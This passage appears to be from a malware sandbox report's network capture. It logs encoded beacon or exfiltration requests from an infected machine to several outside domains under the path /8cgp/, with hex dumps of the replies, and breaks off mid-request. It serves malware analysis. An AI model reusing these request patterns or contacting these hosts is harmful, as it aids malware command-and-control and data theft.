4b 56 31 55 42 6d 78 66 35 31 4e 50 49 50 34 37 7a 44 34 50 61 58 7a 6f 35 53 42 33 49 48 2f 72 45 56 57 4b 52 73 49 47 6d 73 70 43 48 44 39 42 4d 75 45 37 56 48 2f 30 33 53 4a 47 31 73 65 52 4b 4c 53 65 2b 44 67 51 7a 70 4a 6f 35 61 6a 4f 35 56 42 59 72 74 38 66 4f 64 34 46 64 76 48 33 34 42 63 55 66 69 4e 52 33 68 78 48 61 59 6b 6a 78 6e 4a 50 79 55 49 4c 47 4b 36 63 4d 73 61 54 74 4c 48 76 43 56 44 38 79 34 69 6f 79 50 70 78 2f 30 56 48 4d 72 67 47 47 55 51 33 79 41 74 63 71 35 52 69 53 33 35 4d 52 7a 31 64 74 4a 59 68 76 33 39 66 6f 54 5a 4f 77 34 63 5a 75 74 2f 4a 69 6d 6a 69 6e 79 62 4a 79 7a 76 46 61 46 70 59 68 58 7a 33 57 53 67 43 50 7a 66 6a 39 79 4f 30 68 33 33 62 71 2f 6c 36 77 7a 44 6c 30 58 61 6d 49 4d 45 6d 70 79 6f 57 6a 44 66 52 44 56 63 34 68 55 49 41 32 6d 6b 78 66 56 4c 57 47 32 70 53 6f 73 76 65 4e 67 78 53 53 74 6a 73 35 65 6a 75 39 67 44 63 6a 32 78 73 51 6a 31 41 78 5a 78 63 32 56 4e 33 54 70 2b 35 41 37 38 6a 53 58 31 74 55 42 56 4a 77 67 2b 56 76 32 59 76 6b 44 59 30 62 4c 72 45 4e 79 37 35 46 54 6b 77 4a 79 39 36 71 5a 66 37 49 48 6a 49 5a 4e 63 6c 7a 46 74 73 45 4d 35 74 70 65 46 4c 41 4d 64 39 58 69 4f 6b 55 6c 48 61 77 44 67 76 49 35 58 51 35 32 41 39 6a 48 49 2b 72 59 73 67 30 6b 4f 77 72 70 30 5a 68 32 6d 59 62 50 65 4f 4e 6b 76 33 78 42 2f 2b 79 6c 78 50 33 57 2b 43 34 4d 76 33 4a 70 41 7a 68 36 76 6c 46 36 38 63 59 78 63 65 69 4f 43 70 49 52 4b 79 55 31 37 6d 44 52 64 42 70 6c 64 36 4e 51 73 42 61 4f 62 4d 39 56 5a 32 55 4f 4e 6c 70 32 56 65 33 51 74 50 69 5a 6d 4e 42 6e 31 68 6c 43 59 6e 4e 31 63 58 41 62 6d 44 5a 50 42 67 30 78 33 34 79 64 76 32 55 51 31 4c 4f 61 74 7a 6f 75 59 41 4c 43 52 39 41 6b 48 42 69 4e 59 4a 38 50 68 45 55 49 74 6f 71 67 47 6a 6e 54 34 63 53 43 4f 69 61 38 67 71 57 4d 57 6b 57 37 46 52 58 39 54 30 56 4a 63 76 52 69 73 48 70 6f 4c 57 5a 52 49 6b 59 48 58 31 44 62 35 45 2b 44 4b 6a 72 39 50 33 78 56 69 4c 36 54 58 6e 75 72 68 50 42 36 66 35 65 77 6c 5a 75 71 6e 56 2f 48 69 64 55 4b 2b 61 31 6c 50 58 39 43 55 78 74 66 4e 7a 37 4a 74 76 37 6e 55 38 4a 2b 54 2b 51 56 56 49 6c 6f 4d 30 6c 77 4e 2b 75 53 6a 46 43 64 4e 44 7a 34 48 4d 67 61 6a 6d 61 6d 45 50 62 55 44 33 34 38 6f 59 73 43 4c 70 79 76 6e 74 37 78 2f 46 61 6b 43 67 37 50 4b 6d 52 73 47 73 4c 71 39 78 6b 4a 68 37 4f 58 44 36 7a 39 44 70 54 67 70 2b 53 4e 51 4c 6f 70 4c 37 6b 64 33 59 39 66 73 72 2b 6f 4e 34 6f 2f 6a 48 30 6c 70 45 6c 41 37 6f 4c 56 73 43 45 61 52 44 6f 34 47 5a 49 70 64 4b 66 67 75 41 4d 65 4f 6a 76 73 4f 64 54 4c 47 48 4c 68 53 63 73 57 67 4d 4b 39 74 36 76 6c 46 64 51 5a 45 37 6e 33 38 6c 46 4e 59 42 4e 75 38 64 62 63 6b 37 76 65 6d 64 37 77 49 79 6f 69 66 6b 69 50 54 30 75 6b 56 2f 41 46 78 45 72 47 63 68 44 46 61 4c 58 59 50 51 57 47 6b 4b 6a 56 51 6c 2b 66 69 57 68 61 70 72 77 7a 75 6a 5a 48 4e 42 38 55 68 52 51 63 4f 59 51 72 2b 43 4b 55 56 4b 4d 73 53 38 32 69 30 68 51 33 6e 79 49 77 44 36 50 30 4f 5a 6f 4b 79 56 34 55 6b 6e 48
                                                                    Data Ascii: Xh9lX=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
                                                                    Apr 24, 2024 12:32:30.916146040 CEST3867OUTData Raw: 63 67 67 35 76 54 4a 50 35 6c 50 74 6f 4a 79 37 4e 4a 4d 44 53 52 64 31 4a 53 63 4a 49 2b 7a 64 73 66 78 32 52 46 71 68 4e 4f 6f 4f 68 68 36 4e 53 44 32 73 4a 55 2b 59 37 44 7a 52 34 59 43 4b 69 31 61 30 4f 57 77 64 67 69 6d 65 62 2b 76 35 56 71
                                                                    Data Ascii: cgg5vTJP5lPtoJy7NJMDSRd1JScJI+zdsfx2RFqhNOoOhh6NSD2sJU+Y7DzR4YCKi1a0OWwdgimeb+v5VqXaFmbRuFIlTZVYb0Q8mqyq/neemuWbUKiWZ/imHKru32NVUpFeM1fToAYTMzUc7MBnKTU7h1Nvcd0Am4ry6bhuejK0IUdVFnt+ajDRUEppkhYsupcaJxjbUP9tADjtX6VZIqkMS1ediM352UvQXbqFDAA2YiodahP
                                                                    Apr 24, 2024 12:32:30.916199923 CEST6445OUTData Raw: 58 6c 73 39 4d 51 71 6b 66 38 38 56 54 6d 47 4b 71 49 49 58 5a 63 36 56 63 38 58 2f 46 34 59 52 6d 4e 78 66 59 4c 71 36 30 51 76 35 67 73 39 70 7a 30 6b 44 6d 79 49 79 30 39 51 6a 35 7a 31 74 2f 65 70 66 55 5a 50 39 31 79 41 4a 31 63 4f 30 4d 61
                                                                    Data Ascii: Xls9MQqkf88VTmGKqIIXZc6Vc8X/F4YRmNxfYLq60Qv5gs9pz0kDmyIy09Qj5z1t/epfUZP91yAJ1cO0Ma7WZyFp29M/YZY0OSaIkgcfwDKtmpG7VTVDtsPrGywfxBUreq/7fDnwhWPYZ7SXF3Cl07MAMgN9RGuSwIC4BzqwtnzSrkQiNlzAXpdeXNceabURiOshVsM0XYJrJn4kLdYgkj8OEXVYQ535nT32KhvYt054Z0c2dqL
                                                                    Apr 24, 2024 12:32:31.253992081 CEST2578OUTData Raw: 72 75 43 54 6a 43 38 38 33 54 71 58 63 6f 64 37 66 2f 4b 65 4a 72 7a 55 6c 33 61 46 34 74 52 30 56 30 72 69 77 4d 30 65 70 46 6d 34 31 6e 74 53 73 6b 31 37 52 32 76 36 44 67 31 31 4d 75 34 42 6f 6f 56 54 6e 56 56 65 59 75 4f 39 46 52 33 47 79 41
                                                                    Data Ascii: ruCTjC883TqXcod7f/KeJrzUl3aF4tR0V0riwM0epFm41ntSsk17R2v6Dg11Mu4BooVTnVVeYuO9FR3GyAxMviIXGd02dhkZr+O7YUb30v6J3dYVMl/pgzd9trZ2tqkw0i5j5xgEvWchfNClsBqg0Y55HSQJ07Oyan6oMg/5NZURtxSe8qbQp4jTqa3BlSq197lHeG2WdvWpIqKlOhUGtvnrRjc8ul0s2XHzBOH4CrUgm4EQ77h
                                                                    Apr 24, 2024 12:32:31.254139900 CEST10312OUTData Raw: 53 51 4e 74 30 78 6b 71 43 39 73 32 65 47 68 57 47 4f 71 2b 68 6e 47 78 6d 55 71 54 4b 6e 31 6a 43 42 64 5a 68 34 48 67 6e 44 67 4b 6c 53 57 41 78 48 38 5a 63 61 37 79 6b 6b 4f 49 58 49 74 4a 6a 5a 36 73 5a 6a 66 70 42 47 64 76 43 57 42 66 35 79
                                                                    Data Ascii: SQNt0xkqC9s2eGhWGOq+hnGxmUqTKn1jCBdZh4HgnDgKlSWAxH8Zca7ykkOIXItJjZ6sZjfpBGdvCWBf5yxcLL+1azVMslMFdHgYZ2ltVWLPPrvowBwAlCxEECgHcJQ/9Fq6jpjj1qidSjiFe2V4AosierF1Dbvbeq8wn+wYOjvZh1OaTtvJ+s6M4Qr5EsbwWB86SMm4OBHNCMGEkUbSCQjK7aRzkBA+FH3cKMPlXRjDsgW2+U1


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    57192.168.11.205030284.32.84.3280
                                                                    TimestampBytes transferredDirectionData
                                                                    Apr 24, 2024 12:32:33.771473885 CEST390OUTGET /8cgp/?Xh9lX=/YVHZOSW055QRFdzHV7EG4MPV06WciwOGAsmatOqDuiKItV6nqBs0pBRyzlLrNgNpWUhFR7Gbz8/7vzQvyrSOcbiMu9Z7oEFzfRxNbVqKIwXHjZvBpZwwR0=&QDnH=ERXP8 HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    Host: www.noispisok.com
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Apr 24, 2024 12:32:34.106499910 CEST1289INHTTP/1.1 200 OK
                                                                    Server: hcdn
                                                                    Date: Wed, 24 Apr 2024 10:32:33 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 10072
                                                                    Connection: close
                                                                    Vary: Accept-Encoding
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    x-hcdn-request-id: 0b1cbfa052c522b2e9456d1a1d783bbe-asc-edge6
                                                                    Expires: Wed, 24 Apr 2024 10:32:32 GMT
                                                                    Cache-Control: no-cache
                                                                    Accept-Ranges: bytes
                                                                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 74 69 74 6c 65 3e 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 22 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f 6f 74 73 74 72 61 70 2f 33 2e 33 2e 37 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 20 72 65 6c 3d 73 74 79 6c 65 73 68 65 65 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 68 74 74 70 73 3a 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 33 2e 32 2e 31 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f 6f 74 73 74 72 61 70 2f 33 2e 33 2e 37 2f 6a 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 6a 73 3e 3c 2f 73 63 72 69 70 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2f 35 2e 31 35 2e 33 2f 63 73 73 2f 61 6c 6c 2e 6d 69 6e 2e 63 73 73 20 72 65 6c 3d 73 74 79 6c 65 73 68 65 65 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 33 30 30 2c 33 30 30 69 2c 34 30 30 2c 34 30 30 69 2c 36 30 30 2c 36 30 30 69 2c 37 30 30 2c 37 30 30 69 2c 38 30 30 2c 38 30 30 69 26 73 75 62 73 65 74 3d 63 79 72 69 6c 6c 69 63 2c 63 79 72 69 6c 6c 69 63 2d 65 78 74 2c 67 72 65 65 6b 2c 67 72 65 65 6b 2d 65 78 74 2c 6c 61 74 69 6e 2d 65 78 74 2c 76 69 65 74 6e 61 6d 65 73 65 22 20 72 65 6c 3d 73 74 79 6c 65 73 68 65 65 74 3e 3c 73 74 79 6c 65 3e 68 74 6d 6c 7b 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 4f 70 65 6e 20 53 61 6e 73 22 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 70 61 64 64 69 6e 67 3a 30 3b
                                                                    Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"Open Sans",Helvetica,sans-serif;color:#000;padding:0;
                                                                    Apr 24, 2024 12:32:34.106559038 CEST1289INData Raw: 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 32 38 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 30 2e 37 64 65 67 2c 23 65 39 65 64 66 62 20 2d 35 30 2e 32 31 25 2c 23 66 36 66
                                                                    Data Ascii: margin:0;line-height:1.428;background:linear-gradient(10.7deg,#e9edfb -50.21%,#f6f8fd 31.11%,#fff 166.02%)}h1,h2,h3,h4,h5,h6,p{padding:0;margin:0;color:#333}h1{font-size:30px;font-weight:600!important;color:#333}h2{font-size:24px;font-weight:6
                                                                    Apr 24, 2024 12:32:34.106703043 CEST1289INData Raw: 33 65 61 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 2d 6e 61 76 3e 6c 69 3e 61 20 69 7b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 35 70 78 7d 2e 6e 61 76 2d 62 61 72 20 69 6d 67 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 74
                                                                    Data Ascii: 3ea!important}.navbar-nav>li>a i{margin-right:5px}.nav-bar img{position:relative;top:3px}.congratz{margin:0 auto;text-align:center}.top-container{display:flex;flex-direction:row}.message-subtitle{color:#2f1c6a;font-weight:700;font-size:24px;li
                                                                    Apr 24, 2024 12:32:34.106739044 CEST1289INData Raw: 69 7a 65 3a 31 32 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 36 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 32 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 32 30 70 78 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 3b 74 65 78
                                                                    Data Ascii: ize:12px;line-height:16px;min-height:20px;min-width:20px;vertical-align:middle;text-align:center;display:inline-block;padding:4px 8px;font-weight:700;border-radius:4px;background-color:#fc5185}@media screen and (max-width:768px){.message{width
                                                                    Apr 24, 2024 12:32:34.106765985 CEST1289INData Raw: 72 69 61 6c 73 20 72 65 6c 3d 6e 6f 66 6f 6c 6c 6f 77 3e 3c 69 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 74 72 75 65 20 63 6c 61 73 73 3d 22 66 61 73 20 66 61 2d 67 72 61 64 75 61 74 69 6f 6e 2d 63 61 70 22 3e 3c 2f 69 3e 20 54 75 74 6f 72 69 61 6c
                                                                    Data Ascii: rials rel=nofollow><i aria-hidden=true class="fas fa-graduation-cap"></i> Tutorials</a></li><li><a href=https://support.hostinger.com/en/ rel=nofollow><i aria-hidden=true class="fa-readme fab"></i>Knowledge base</a></li><li><a href=https://www
                                                                    Apr 24, 2024 12:32:34.106792927 CEST1289INData Raw: 20 68 6f 73 74 69 6e 67 20 66 6f 72 20 79 6f 75 72 20 73 75 63 63 65 73 73 66 75 6c 20 6f 6e 6c 69 6e 65 20 70 72 6f 6a 65 63 74 73 2e 3c 2f 70 3e 3c 62 72 3e 3c 61 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 68 6f 73 74 69 6e 67 65 72
                                                                    Data Ascii: hosting for your successful online projects.</p><br><a href=https://www.hostinger.com rel=nofollow>Find your hosting plan</a></div></div><div class="col-xs-12 col-sm-4 column-custom-wrap"><div class=column-custom><div class=column-title>Add w
                                                                    Apr 24, 2024 12:32:34.106822968 CEST1289INData Raw: 5b 5d 2c 6e 3d 30 2c 74 3d 6f 2e 6c 65 6e 67 74 68 3b 6e 3c 74 3b 29 7b 69 66 28 35 35 32 39 36 3d 3d 28 36 33 34 38 38 26 28 72 3d 6f 5b 6e 2b 2b 5d 29 29 29 74 68 72 6f 77 20 6e 65 77 20 52 61 6e 67 65 45 72 72 6f 72 28 22 55 54 46 2d 31 36 28
                                                                    Data Ascii: [],n=0,t=o.length;n<t;){if(55296==(63488&(r=o[n++])))throw new RangeError("UTF-16(encode): Illegal UTF-16 value");65535<r&&(r-=65536,e.push(String.fromCharCode(r>>>10&1023|55296)),r=56320|1023&r),e.push(String.fromCharCode(r))}return e.join(""
                                                                    Apr 24, 2024 12:32:34.106865883 CEST1289INData Raw: 69 63 65 28 66 2c 30 2c 61 29 2c 66 2b 2b 7d 69 66 28 74 29 66 6f 72 28 66 3d 30 2c 77 3d 6d 2e 6c 65 6e 67 74 68 3b 66 3c 77 3b 66 2b 2b 29 79 5b 66 5d 26 26 28 6d 5b 66 5d 3d 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6d 5b 66
                                                                    Data Ascii: ice(f,0,a),f++}if(t)for(f=0,w=m.length;f<w;f++)y[f]&&(m[f]=String.fromCharCode(m[f]).toUpperCase().charCodeAt(0));return this.utf16.encode(m)},this.encode=function(t,a){var h,f,i,c,u,d,l,p,g,s,C,w;a&&(w=this.utf16.decode(t));var v=(t=this.utf1
                                                                    Apr 24, 2024 12:32:34.106899977 CEST100INData Raw: 2c 61 63 63 6f 75 6e 74 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 70 61 74 68 4e 61 6d 65 22 29 3b 61 63 63 6f 75 6e 74 2e 69 6e 6e 65 72 48 54 4d 4c 3d 70 75 6e 79 63 6f 64 65 2e 54 6f 55 6e 69 63 6f 64 65 28
                                                                    Data Ascii: ,account=document.getElementById("pathName");account.innerHTML=punycode.ToUnicode(pathName)</script>


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    58192.168.11.2050303118.27.122.21480
                                                                    TimestampBytes transferredDirectionData
                                                                    Apr 24, 2024 12:32:39.401813984 CEST668OUTPOST /8cgp/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 202
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: www.kansaiwoody.com
                                                                    Origin: http://www.kansaiwoody.com
                                                                    Referer: http://www.kansaiwoody.com/8cgp/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Data Raw: 58 68 39 6c 58 3d 46 66 2b 49 6f 43 4a 49 6f 42 67 4c 72 6b 47 51 4d 63 4a 65 45 45 4e 6a 58 62 55 70 6b 46 4e 33 4d 32 6e 2b 76 51 6c 34 57 4b 52 52 6a 37 30 50 50 68 51 4d 75 77 32 71 41 43 6c 6d 5a 79 4c 33 76 66 6e 4d 41 78 42 33 51 67 70 4f 76 46 31 63 62 6f 50 32 46 46 2b 6f 79 43 6d 6a 53 38 53 35 47 6b 58 78 32 6f 4d 61 36 41 6b 71 52 32 35 7a 37 33 4d 53 7a 76 67 2b 6c 56 68 72 45 34 75 6b 66 64 6a 54 6f 50 69 6d 6d 48 69 2b 30 52 6a 2b 74 4a 59 52 49 55 79 43 79 30 31 64 6c 6d 73 6e 4d 56 52 6e 59 59 35 69 51 31 4e 67 32 75 77 69 79 75 47 72 2f 43 35 4e 73 71 37 58 75 77 38 78 4a 41 3d 3d
                                                                    Data Ascii: Xh9lX=Ff+IoCJIoBgLrkGQMcJeEENjXbUpkFN3M2n+vQl4WKRRj70PPhQMuw2qAClmZyL3vfnMAxB3QgpOvF1cboP2FF+oyCmjS8S5GkXx2oMa6AkqR25z73MSzvg+lVhrE4ukfdjToPimmHi+0Rj+tJYRIUyCy01dlmsnMVRnYY5iQ1Ng2uwiyuGr/C5Nsq7Xuw8xJA==
                                                                    Apr 24, 2024 12:32:39.681875944 CEST377INHTTP/1.1 404 Not Found
                                                                    Server: nginx
                                                                    Date: Wed, 24 Apr 2024 10:32:39 GMT
                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Content-Encoding: gzip
                                                                    Data Raw: 61 63 0d 0a 1f 8b 08 00 00 00 00 00 04 03 4d 8e bd 0e 82 30 14 85 f7 3e c5 95 5d 2e 1a c6 a6 83 02 91 04 91 98 32 38 62 7a 4d 49 90 22 2d 1a df de 02 8b e3 f9 fb 72 f8 26 b9 1c e5 ad 4a e1 24 cf 05 54 f5 a1 c8 8f 10 6c 11 f3 54 66 88 89 4c d6 64 1f 46 88 69 19 08 c6 b5 7b 76 82 6b 6a 94 17 ae 75 1d 89 38 8a a1 34 0e 32 33 f5 8a e3 6a 32 8e 4b 89 df 8d fa ce bb 9d f8 eb 78 c5 f8 20 a4 26 18 e9 35 91 75 a4 a0 be 16 f0 69 2c f4 9e f5 98 59 60 7a 70 ba b5 60 69 7c d3 18 72 1c fc 0c 17 a2 c7 cf 4f d8 0f f3 7c 15 3c c4 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: acM0>].28bzMI"-r&J$TlTfLdFi{vkju8423j2Kx &5ui,Y`zp`i|rO|<0


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    59192.168.11.2050304118.27.122.21480
                                                                    TimestampBytes transferredDirectionData
                                                                    Apr 24, 2024 12:32:42.213643074 CEST1008OUTPOST /8cgp/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 542
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: www.kansaiwoody.com
                                                                    Origin: http://www.kansaiwoody.com
                                                                    Referer: http://www.kansaiwoody.com/8cgp/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
